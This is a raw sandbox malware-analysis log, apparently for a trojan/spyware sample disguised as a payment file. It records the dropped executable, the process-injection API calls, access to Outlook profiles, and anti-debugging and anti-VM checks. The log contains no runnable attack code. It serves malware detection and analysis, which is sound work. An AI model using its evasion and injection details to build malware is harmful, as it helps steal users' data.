          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DA3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DAD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95F0 NtQueryInformationFile,
          Source: OUTSTANDING_PAYMENT.exeReversingLabs: Detection: 71%
          Source: OUTSTANDING_PAYMENT.exeVirustotal: Detection: 72%
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile read: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeJump to behavior
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nsmF14E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@26/12
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C52DA9 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F44E2 push E4DD4FA3h; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F49A2 pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00406066 push edi; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00409120 push ss; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041B2DF push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421286 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040F3BA pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401DE0 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004105B5 push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401635 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041B682 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00410E9F push cs; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00408F17 push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040F726 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C52DA9 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012ED0D1 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\qhcqh.exeJump to dropped file
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 1328Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280Thread sleep count: 60 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 rdtsc
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeAPI coverage: 5.8 %
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F30FA GetSystemInfo,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000002.790142809.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSt%SystemRoot%\system32\mswsock.dlls\StoreBadgeLogo.pngU
          Source: explorer.exe, 00000003.00000003.476355979.000000000F7D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.670095974.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000002.777751246.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\wshqos.dll,-103a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000003.670660288.00000000050C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000003.00000000.276570847.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.266462070.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5A330 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A5E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A29 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F297F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01361074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01352073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 mov eax, dword ptr fs:[00000030h]
